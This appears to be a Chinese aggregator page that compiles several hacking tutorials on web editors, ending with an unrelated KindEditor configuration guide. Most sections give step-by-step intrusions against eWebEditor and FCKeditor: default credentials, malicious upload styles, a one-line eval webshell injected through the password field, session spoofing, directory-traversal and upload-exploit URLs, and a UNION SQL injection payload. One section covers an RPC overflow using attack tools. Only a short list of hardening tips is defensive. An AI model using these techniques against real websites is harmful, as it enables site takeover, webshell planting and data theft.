以下是小编精心整理的浅析Webedit在线编辑器的入侵,本文共6篇,供大家阅读参考。

篇1:浅析Webedit在线编辑器的入侵
ewebeditor编辑器可一般默认数据库路径是db/ewebeditor.mdb
默认的后台路径是admin/admin_login.asp
有的时候管理员修改为asp、asa,可以插入一句话
有的时候爆了数据库找不到后台地址让人发急,其实可以试试查看样式表,有没别人加入的后缀样式表,直接利用上传,具体看完文章我想大家都有个全新的认识了
还有的时候聪明的管理员也就是加“#”不妨社工试试,我可没少占便宜的
例如:db/#ewebeditor.asa、db/#ewebeditor.asp
有次无意的入侵使我发现了ewebeditor2.7.0版本的存在注入漏洞
简单利用就是
site/path/ewebeditor/ewebeditor.asp?id=article_content&style=full_v200
www.siqinci.com/ewebedito ... amp;style=full_v200
可以利用nbsi进行猜解,对此进行注入
还有的时候管理员不让复制样式,但是你又看到有个样式被别人以前入侵修改了存在asa或者之类可以传shell,但是上传插入工具没有,又无法修改怎么办那?也许很多人说应该可以加工具栏,但是我就遇见过不让加的
这样我们可以利用ewebeditor里的upload.asp文件进行本地构造进行上传具体如下:
文件上传
还有种方式是最近坏客发现的
利用WebEditor session欺骗漏洞,进入后台:
漏洞文件:Admin_Private.asp
漏洞语句:<%
If Session(“eWebEditor_User”) = “” Then
Response.Redirect “admin_login.asp”
Response.End
End If
只判断了session,没有判断cookies和路径的验证问题,
浅析Webedit在线编辑器的入侵
,
漏洞利用:
新建一个amxking.asp内容如下:
<%Session(“eWebEditor_User”) = “11111111”%>
访问amxking.asp,再访问后台任何文件,for example:Admin_Default.asp
篇2:脚本入侵 入侵ewebeditor编辑器一些技巧
脚本入侵 入侵ewebeditor编辑器一些技巧,使用ewebeditor的朋友可以参考下,
eWebEditor编辑器建议最好检测下admin_style.asp文件是否可以直接访问 直接到样式管理
默认后台地址:/ewebeditor/admin_login.asp
使用默认密码:admin/admin 或 admin/admin888
不行就默认数据库路径 eWebEditor/db/ewebeditor.mdb 或eWebEditor/db/%23ewebeditor.mdb
拿webshell方法第一种方法
登陆后台点击“样式管理”-选择新增样式
只写这几样 大家照做就行了
样式名称:chouxiaozi 随便写
路径模式:选择绝对路径
图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
这样我们可以上各种格式的木马 我们只要把木马改成添加的这些格式就可以了
上传路径:写上这个admin/ 或写/ 免的别人把UploadFile/目录删了 我们找不到马
内容路径:空 记得
图片限制:写上1000 免的上不了我们的asp木马
然后我们就可以提交了
就可以看到样式增加成功!
然后我们按-返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
然后按-按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置
在返回样式管理-找到刚才添加的样式名称-按预览-这里回看到一个正方形的东西 我们点击
然后上传我们的刚才添加的格式的木马
拿webshell方法第二种方法
登陆后台,点击修改密码---新密码设置为 1“:eval request(”choxiaozi“)’
设置成功后,访问asp/config.asp文件即可,一句话木马被写入到这个文件里面了.
然后用一句话客户端连接
拿webshell方法第三种方法
ewebeditor不登陆也获得webshell 这就不多说了 大家去百度搜索 ewebeditor不登陆也获得webshell
下载教程看
拿webshell方法第四种方法
利用ewebeditor asp版 2.1.6 上传漏洞利用程序
首先先看eWebEditor/upload.asp 上传地址存在不
存在的话就把下面的代码保存为
H1>ewebeditor asp版 2.1.6 上传漏洞利用程序----
改上传地址保存为chouxiaozi.HTM文件,打开可以直接上传CER文件,测试成功.上传后地址看源文件
就可以看到我们上传的路径和地址
拿webshell方法第五种方法
ewebeditor 鸡肋的上传漏洞
首先先看下ewebeditor/asp/upload.asp 上传地址存在不
存在就
把下面的代码
然后保存为chouxiaozi.html
打开可以直接上传gif文件,测试成功.上传后地址看源文件
就可以看到我们上传的路径和地址
拿webshell方法第六种方法
利用eWebEditor/upload.asp
抓包和nc上传
抓包cookies 参数 和文件的数据 然后保存成文本 比如chouxiaozi.txt
然后用编译C32asm 或等等编译工具 修改
然后用nc.exe 提交 命令nc -vv site 80
不懂抓包和nc上传 百度搜索相关教程
回头说下有时候进了个网站后台-看到了eWebEditor编辑器 但是找不到eWebEditor目录地址
我们来点鼠标右键-查看源代码,找到仔细找eWebEditor的路径,
电脑资料
篇3:浅析asp版本ewebeditor在线编辑器
Ewebeditor编辑器目前分为asp,aspx,php,jsp四种程序,各类ewebeditor版本很多,功能强大颇收使用者喜爱,在国内使用极为广泛,对于目前asp版本的ewebeditor编辑器漏洞主要分为以下7点:
默认,遍历目录漏洞,一句话,注入,构造,cookie欺骗,社工(踩脚印入侵),
NO1.ewebeditor编辑器一般默认数据库路径是db/ewebeditor.mdb
默认的后台路径是admin_login.asp
建议最好检测下admin_style.asp文件是否可以直接访问
NO2.遍历目录漏洞(具体如下):
登陆编辑器---上传文件管理---选择样式目录(随便选一个目录)
得到:
ewebeditor/admin_uploadfile.asp?id=14
在id=14后面添加&dir=..
再加 &dir=../..
&dir=../../../.. 看到整个网站文件了
此漏洞危害大大的,绝对恐怖
NO3.当数据库被管理员修改为asp、asa后缀的时候,可以插一句话木马服务端进入数据库,然后一句话木马客户端连接拿下webshell
NO4.有的时候爆了数据库找不到后台地址让人发急,其实可以试试查看样式表,有没别人加入的asp、asa后缀样式表,也就是虽说的踩着脚印入侵。
还有的时候聪明的管理员也就是加“#”不妨社工试试,我可没少占便宜的
例如:db/#ewebeditor.asa、db/#ewebeditor.asp 、db/#ewebeditor.mdb
NO5.注入2.1.6的注入就不多说了,如下保存为html文件修改action,直接上传cer马
ewebeditor asp版 2.1.6 上传漏洞利用程序----
union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,
S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b’|cer’,S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_Medi
aSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name=’standard’and’a’=’a” method=post name=myform enctype=“multipart/form-data”>
有次无意的入侵使我发现了ewebeditor2.7.0版本的存在注入漏洞
简单利用就是
site/path/ewebeditor/ewebeditor.asp?id=article_content&style=full_v200
默认表名:eWebEditor_System默认列名:sys_UserName、sys_UserPass,然后利用nbsi进行猜解,对此进行注入取得账号密码
NO6.有的时候管理员不让复制样式,但是你又看到有个样式被别人以前入侵修改了存在asa或者之类可以传shell,但是上传插入工具没有,又无法修改怎么办那?也许很多人说应该可以加工具栏,但是我就遇见过不让加的
这样我们可以利用ewebeditor里的upload.asp文件进行本地构造进行上传具体如下: (略)
NO.7还有种方式是最近坏客发现的
利用WebEditor session欺骗漏洞,进入后台:
漏洞文件:Admin_Private.asp
漏洞语句:
<%
If Session(“eWebEditor_User”) = “” Then
Response.Redirect “admin_login.asp”
Response.End
End If
只判断了session,没有判断cookies和路径的验证问题,
漏洞利用:
新建一个amxking.asp内容如下:
<%Session(“eWebEditor_User”) = “11111111”%>
访问amxking.asp,再访问后台任何文件,for example:Admin_Default.asp
面对此种威胁网站管理员应该做好如下的防范措施:
1、使用了eWebEditor编辑器的网站,应及时修改该编辑器的默认数据库路径和后缀名,建议数据库多方几层目录,防止数据库被 非法下载
2、修改编辑器后台登陆路径和默认的登陆用户名和密码,防止 进入后台管理界面
3、对Upload.asp语句进行修改,防止 利用其上传ASP木马从而获得WEB权限
4、及时对网站服务器IIS配置中的应用程序扩展名映射进行整理,确保其它类型的文件不能在服务器网站上运行
篇4: 在线之经典入侵技术总结 (三)
三、毁灭者RPC
在线之经典入侵技术总结 (三)
。 RPC漏洞简介: Windows PRC Locator服务是一款映射逻辑名称到网络特定名称的名字 服务。客户端使用RPC(remote procedure call)远程过程调用Locator服务,Locator服务 负责把客户提交的网络名解析转换为硬盘,打印机等计算机系统上实际资源的地址。如果某一个打印机服务器逻辑名为“laserprinter”,RPC客户端调用 Locator服务来找出网络名所映射的“laserprinter”,RPC客户端在调用RPC服务的时候使用网络名来提交请求。 不过Locator服务在接收注册信息的时候没有对Locator服务的参数进行详细检查,超长超大的参数可以导致服务程序触发缓冲区溢出,使Locator服务崩溃,精心构建提交数据可能以Locator服务进程的权限在系统上执行任意指令,而且攻击者获取的是system权限,
默认情况下Windows 域控制器上Locator服务是默认运行,而一般的windows工作站和服务器是默认是不开始这个服务,但是如果这些操作系统一旦启动了Locator服务就也存在着此漏洞。 攻击工具: 扫描工具:Locator Scanner(一个专门用来扫描此漏洞的命令行下运行的扫描程序,可以用它来扫描开放了RPC Locator服务的主机,要注意的是Locator Scanner只能扫描C 类网络地址。) 溢出程序:Re.exe 简单入侵: 1. 进入控制台模式(cmd模式):使用命令:rpc 192.168.0.1 192.168.0.254 这样我们就找到了一个开放了Locator Service的主机,该主机的地址是:192.168.0.2。 提示:Locator Scanner的用法是: C:\>rpc IPAddress-Start IPAddress-End IPAddress-Start :扫描开始的IP地址 IPAddress-End:扫描结束的IP地址 2. 使用RPC的专用溢出工具进行溢出,其溢出后得到的权限是system权限。 使用命令:re -h 192.168.0.2 至此攻击入侵结束! 如何防御: 如果你的计算机不是windows网络的域控制器,那强烈建议你不要使用locator服务,如果已经开放了就关闭此服务,如何关闭Windows Locator服务是否运行,在Windows 2000和Windows XP系统下,打开“控制面板-管理工具-服务”查看 Remote procedure call(RPC)Locator服务是否启动,如果已经启动可以停止它,并将RPC Locator服务状态设置为“禁用”。 如果确实需要locator服务,那请尽快打上补丁。
篇5:实例讲解如何利用网页编辑器入侵 武林安全网
FCKeditor
FCKeditor编辑器页/查看编辑器版本/查看文件上传路径
FCKeditor编辑器页
FCKeditor/_samples/default.html
查看编辑器版本
FCKeditor/_whatsnew.html
查看文件上传路径
fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
XML页面中第二行 “url=/xxx”的部分就是默认基准上传路径
Note:[Hell1]截至02月15日最新版本为FCKeditor v2.6.6
[Hell2]记得修改其中两处asp为FCKeditor实际使用的脚本语言
FCKeditor被动限制策略所导致的过滤不严问题
影响版本: FCKeditor x.x <= FCKeditor v2.4.3
脆弱描述:
FCKeditor v2.4.3中File类别默认拒绝上传类型:html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|
pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm
Fckeditor 2.0 <= 2.2允许上传asa、cer、php2、php4、inc、pwml、pht后缀的文件
上传后 它保存的文件直接用的$sFilePath = $sServerDir . $sFileName,而没有使用$sExtension为后缀
直接导致在win下在上传文件后面加个.来突破[未测试]
而在apache下,因为“Apache文件名解析缺陷漏洞”也可以利用之,详见“附录A”
另建议其他上传漏洞中定义TYPE变量时使用File类别来上传文件,根据FCKeditor的代码,其限制最为狭隘,
攻击利用:
允许其他任何后缀上传
Note:[Hell1]原作:superhei.blogbus.com/logs//02/1916091.html
利用路径解析漏洞上传网马
影响版本: 附录B
脆弱描述:
利用2003系统路径解析漏洞的原理,创建类似“bin.asp”如此一般的目录,再在此目录中上传文件即可被脚本解释器以相应脚本权限执行。
攻击利用:
fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp
FCKeditor PHP上传任意文件漏洞
影响版本: FCKeditor 2.2 <= FCKeditor 2.4.2
脆弱描述:
FCKeditor在处理文件上传时存在输入验证错误,远程攻击可以利用此漏洞上传任意文件,
在通过editor/filemanager/upload/php/upload.php上传文件时攻击者可以通过为Type参数定义无效的值导致上传任意脚本。
成功攻击要求config.php配置文件中启用文件上传,而默认是禁用的。攻击利用: (请修改action字段为指定网址):
FCKeditor 《=2.4.2 for php.html
Note:如想尝试v2.2版漏洞,则修改Type=任意值 即可,但注意,如果换回使用Media则必须大写首字母M,否则LINUX下,FCKeditor会对文件目录进行文件名校验,不会上传成功的。
TYPE自定义变量任意上传文件漏洞
影响版本: 较早版本
脆弱描述:
通过自定义Type变量的参数,可以创建或上传文件到指定的目录中去,且没有上传文件格式的限制。
攻击利用: /FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp
打开这个地址就可以上传任何类型的文件了,Shell上传到的默认位置是:
www.heimian.com/UserFiles/all/1.asp
“Type=all” 这个变量是自定义的,在这里创建了all这个目录,而且新的目录没有上传文件格式的限制.
比如输入:
/FCKeditor/editor/filemanager/browser/default/browser.html?Type=../&Connector=connectors/asp/connector.asp
网马就可以传到网站的根目录下.
Note:如找不到默认上传文件夹可检查此文件: fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor 新闻组件遍历目录漏洞
影响版本:aspx版FCKeditor,其余版本未测试
脆弱描述:如何获得webshell请参考上文“TYPE自定义变量任意上传文件漏洞”
攻击利用:
修改CurrentFolder参数使用 ../../来进入不同的目录
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=aspx.asp
根据返回的XML信息可以查看网站所有的目录。
/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F
FCKeditor中webshell的其他上传方式
影响版本:非优化/精简版本的FCKeditor
篇6:kindSoft在线网页编辑器简单的配置参数介绍
作者: 字体:[增加 减小] 类型:转载
对于网页编辑器对做项目的时候是非常的又用的一个编辑器,大大的减轻了开发人员的负担,感觉KindSoft是一个不错的选择,因此也在不断的使用接下来介绍参数配置,需要的朋友可以了解下
对于网页编辑器对做项目的时候是非常的又用的一个编辑器,大大的减轻了开发人员的负担,感觉KindSoft是一个不错的选择,因此也在不断的使用,
下面对一些简单的配置进行归纳一下:
首先是将下载的KindSoft文件导入到项目的目录下;
代码如下:
这两个引用在xx.aspx文件的Head部分
然后插入下面的一段代码:
代码如下:
tbContent是要嵌入的Input标签的id值,呵呵嘿嘿、、惊喜就出现了;如下图所示:
但是如果要进行图片、flash或者视频的上传的话,你就会很郁闷了,很多时候都会因为上传路径不对而出错,因此你需要设置你的图片、flash或者视频文件的路径;只需将上面一段代码改为如下部分则可以满足基本的需求了:
代码如下:
<script. language=“javascript” type=“text/javascript”>
KindEditor.ready(function (K) {
K.create(‘#tbContent‘, {
uploadJson: ‘../Content/kindeditor-4.1.4/asp.net/upload_json.ashx‘,
fileManagerJson: ‘../Content/kindeditor-4.1.4/asp.net/file_manager_json.ashx‘,
allowFileManager: true
});
});
上面标记颜色的部分应该根据自己的文件路径选择合适的路径;
最后就是有关编辑器中的控件并不是自己所需要的,所以你需要在如下的路径进行配置:
展开kindeditor-4.1.4,找到kindeditor.js文件,双击就去,然后找到在246页左右,就有一个Items,在之后又如下的配置参数:
代码如下:
[
‘source‘, ‘|‘, ‘undo‘, ‘redo‘, ‘|‘, ‘preview‘, ‘print‘, ‘template‘, ‘code‘, ‘cut‘, ‘copy‘, ‘paste‘,
‘plainpaste‘, ‘wordpaste‘, ‘|‘, ‘justifyleft‘, ‘justifycenter‘, ‘justifyright‘,
‘justifyfull‘, ‘insertorderedlist‘, ‘insertunorderedlist‘, ‘indent‘, ‘outdent‘, ‘subscript‘,
‘superscript‘, ‘clearhtml‘, ‘quickformat‘, ‘selectall‘, ‘|‘, ‘fullscreen‘, ‘/‘,
‘formatblock‘, ‘fontname‘, ‘fontsize‘, ‘|‘, ‘forecolor‘, ‘hilitecolor‘, ‘bold‘,
‘italic‘, ‘underline‘, ‘strikethrough‘, ‘lineheight‘, ‘removeformat‘, ‘|‘, ‘image‘, ‘multiimage‘,
‘flash‘, ‘media‘, ‘insertfile‘, ‘table‘, ‘hr‘, ‘emoticons‘, ‘baidumap‘, ‘pagebreak‘,
‘anchor‘, ‘link‘, ‘unlink‘, ‘|‘, ‘about‘
]
参数的解释如下:
sourceHTML代码preview预览undo后退redo前进cut剪切copy复制paste粘贴plainpaste粘贴为无格式文本wordpaste从Word粘贴selectall全选justifyleft左对齐justifycenter居中justifyright右对齐justifyfull两端对齐insertorderedlist编号insertunorderedlist项目符号indent增加缩进outdent减少缩进subscript下标superscript上标formatblock段落fontname字体fontsize文字大小forecolor文字颜色hilitecolor文字背景bold粗体italic斜体underline下划线strikethrough删除线removeformat删除格式image图片flashFlashmedia视音频table表格hr插入横线emoticons插入表情link超级链接unlink取消超级链接fullscreen全屏显示about关于print打印code插入程序代码mapGoogle地图baidumap百度地图lineheight行距clearhtml清理HTML代码pagebreak插入分页符quickformat一键排版insertfile插入文件template插入模板anchor插入锚点
★作文在线
文档为doc格式